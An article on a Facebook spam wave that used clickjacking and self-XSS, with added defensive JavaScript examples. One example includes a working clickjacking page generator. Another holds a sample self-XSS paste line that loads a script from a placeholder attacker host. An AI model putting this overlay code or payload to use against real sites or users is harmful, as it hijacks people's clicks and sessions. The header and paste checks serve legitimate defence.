According to Graham Cluley of the antivirus firm Sophos, attackers are using “clickjacking” to hijack users’ clicks. When a user visits what looks like a normal web page and clicks on a button, the page has placed an invisible layer (a transparent frame from the real target site) over the visible button, so the click lands on a hidden element the user never meant to press, such as a Like or Share control. Most users do not even realise they have been clickjacked.
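As an added example that is not part of the original article (and not Sophos’ or Facebook’s code), the overlay technique described above, modelled as the page an attacker would serve, together with the response-header check a defender runs to see whether a page can be framed that way. The origins, header values and button position are constructed for illustration; `frameableBy` is a simplified reading of CSP `frame-ancestors` and `X-Frame-Options`, not a browser’s actual implementation.

```javascript
// Added example, not from the article. Models a clickjacking overlay and the
// header check that decides whether a page can be framed this way.

// Attacker side: the page the victim actually sees. A visible lure button is
// drawn at (100,100); the real target page is loaded in a transparent iframe
// shifted so that the target's own button (at buttonTop/buttonLeft inside the
// target page) sits exactly under the lure. opacity:0 plus a higher z-index
// means the click reaches the hidden frame, not the lure the user is looking at.
function buildClickjackPage(targetUrl, lureText, buttonTop, buttonLeft) {
  const lureTop = 100, lureLeft = 100;
  return [
    '<!doctype html><html><body>',
    `<button style="position:absolute;top:${lureTop}px;left:${lureLeft}px;">${lureText}</button>`,
    `<iframe src="${targetUrl}" scrolling="no"`,
    ` style="position:absolute;top:${lureTop - buttonTop}px;left:${lureLeft - buttonLeft}px;`,
    '        width:1024px;height:768px;border:0;opacity:0;z-index:10;"></iframe>',
    '</body></html>',
  ].join('\n');
}

// Defender side. Split an origin string into the parts CSP source matching uses.
function parseOrigin(origin) {
  const u = new URL(origin);
  const scheme = u.protocol.replace(':', '');
  const port = u.port || (scheme === 'https' ? '443' : '80');
  return { scheme, host: u.hostname, port };
}

// Does one (lower-cased) frame-ancestors source allow `framer` to embed `page`?
// Handles 'none', '*', 'self', scheme sources ("https:") and host sources with
// an optional scheme, leading "*." wildcard and port. Simplified: the spec's
// http->https upgrade rule for scheme-less host sources is not applied.
function sourceMatches(src, framer, page) {
  if (src === "'none'") return false;
  if (src === '*') return true;
  if (src === "'self'") {
    return framer.scheme === page.scheme && framer.host === page.host && framer.port === page.port;
  }
  if (/^[a-z][a-z0-9+.-]*:$/.test(src)) return framer.scheme === src.slice(0, -1);
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^:/]+)(?::(\d+|\*))?$/.exec(src);
  if (!m) return false;
  const [, scheme, wildcard, host, port] = m;
  if (scheme && scheme !== framer.scheme) return false;
  if (wildcard ? !framer.host.endsWith('.' + host) : framer.host !== host) return false;
  if (port && port !== '*' && port !== framer.port) return false;
  return true;
}

// Can a page served with `headers` (any header-name casing) from `pageOrigin`
// be loaded in a frame by a document at `framerOrigin`?
function frameableBy(headers, pageOrigin, framerOrigin) {
  const h = Object.fromEntries(Object.entries(headers).map(([k, v]) => [k.toLowerCase(), v]));
  const page = parseOrigin(pageOrigin);
  const framer = parseOrigin(framerOrigin);

  // A CSP frame-ancestors directive takes precedence: browsers that understand
  // it ignore X-Frame-Options when both are present.
  const csp = h['content-security-policy'] || '';
  const fa = csp.split(';').map(d => d.trim()).find(d => /^frame-ancestors(\s|$)/i.test(d));
  if (fa) {
    const sources = fa.split(/\s+/).slice(1).map(s => s.toLowerCase());
    // An empty source list means no ancestor is allowed.
    return sources.some(s => sourceMatches(s, framer, page));
  }

  const xfo = (h['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return false;
  if (xfo === 'SAMEORIGIN') return sourceMatches("'self'", framer, page);
  // ALLOW-FROM was never implemented by all browsers, and those that do not
  // implement it ignore the header entirely, so treat it (and any unknown
  // value, and no header at all) as unprotected.
  return true;
}

module.exports = { buildClickjackPage, parseOrigin, sourceMatches, frameableBy };
```

If `frameableBy` returns true for the page that hosts a Like or Share button, that button is a candidate for the overlay above; the fix is a `frame-ancestors` directive in the response’s Content-Security-Policy, with `X-Frame-Options` as the fallback for older browsers. Since only the final verdict depends on the framer’s origin, the check can be run unchanged over a crawl of a site’s responses.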
Facebook representatives announced Tuesday that they had identified the method the attackers were using to exploit Facebook pages and called it a “self-XSS browser vulnerability”. XSS, which stands for cross-site scripting, normally exploits a flaw in a website that lets an attacker’s script run in a victim’s browser with that site’s session, so the script can act as the victim (post, like, share) or pull in further malicious code. Self-XSS needs no flaw in the site at all: the victim is talked into running the script themselves, baited with promises of free giveaways or “exclusive” videos that they cannot resist.
According to Sophos, the attack requires the user to copy and paste JavaScript into the browser’s address bar, a trick that Google Chrome and Mozilla Firefox had already mitigated. Sophos testers were able to run JavaScript from the Internet Explorer 8 and 9 address bar without difficulty, but Facebook did not specify which browsers were affected by the spam.
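The address-bar mitigation the article refers to, as an added example that is not the article’s, Sophos’, Facebook’s or any browser’s actual code: a function that models what a mitigated address bar does with pasted text, and the naive check it has to improve on. The sample pasted line is constructed (the remote script URL in it is a placeholder, not a real address); the behaviour modelled is an assumption about how such a mitigation works, namely recognising a `javascript:` URL the way the URL parser would and refusing to execute it against the current page.

```javascript
// Added example, not from the article. Models the paste-into-address-bar
// mitigation against self-XSS.

// A constructed example of the kind of line a self-XSS lure tells the victim to
// paste. The host is a placeholder. Note the leading space and mixed case: a
// check that only looks for the exact prefix "javascript:" would let it through.
const SAMPLE_PASTE =
  " JavaScript:(function(){var s=document.createElement('script');" +
  "s.src='http://attacker.example/x.js';document.body.appendChild(s)})()";

// The check a first attempt would write. It fails on leading whitespace,
// mixed-case schemes and embedded tabs/newlines, all of which the URL parser
// tolerates, so the browser would still execute the script.
function naiveIsJavascriptUrl(text) {
  return text.startsWith('javascript:');
}

// Normalise pasted text the way the URL parser does before it reads the
// scheme: strip leading/trailing C0 control characters and spaces, and remove
// ASCII tab, LF and CR anywhere in the string.
function normaliseUrlInput(text) {
  return text
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, '')
    .replace(/[\t\n\r]/g, '');
}

// Is this string a javascript: URL as the browser would parse it? The scheme
// comparison is case-insensitive.
function isJavascriptUrl(text) {
  return /^javascript:/i.test(normaliseUrlInput(text));
}

// What a mitigated address bar does on paste: a javascript: URL has its scheme
// dropped, so the remainder is treated as ordinary text (a search or a plain
// navigation) instead of running with the open page's origin and session.
// Anything else is passed through untouched.
function sanitizeAddressBarPaste(text) {
  if (!isJavascriptUrl(text)) return { blocked: false, value: text };
  return { blocked: true, value: normaliseUrlInput(text).replace(/^javascript:/i, '') };
}

module.exports = { SAMPLE_PASTE, naiveIsJavascriptUrl, normaliseUrlInput, isJavascriptUrl, sanitizeAddressBarPaste };
```

The point of the normalisation step is that the check must see the same string the URL parser sees; checking the raw pasted text is exactly the gap an attacker’s “add a space at the front” instruction exploits. Stripping the scheme rather than silently dropping the whole paste also lets the user see that something was changed.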
Facebook reportedly took steps to prevent self-XSS attacks after the Bin Laden spam that hit the social network’s news feeds last spring. Now it appears those security measures were not enough.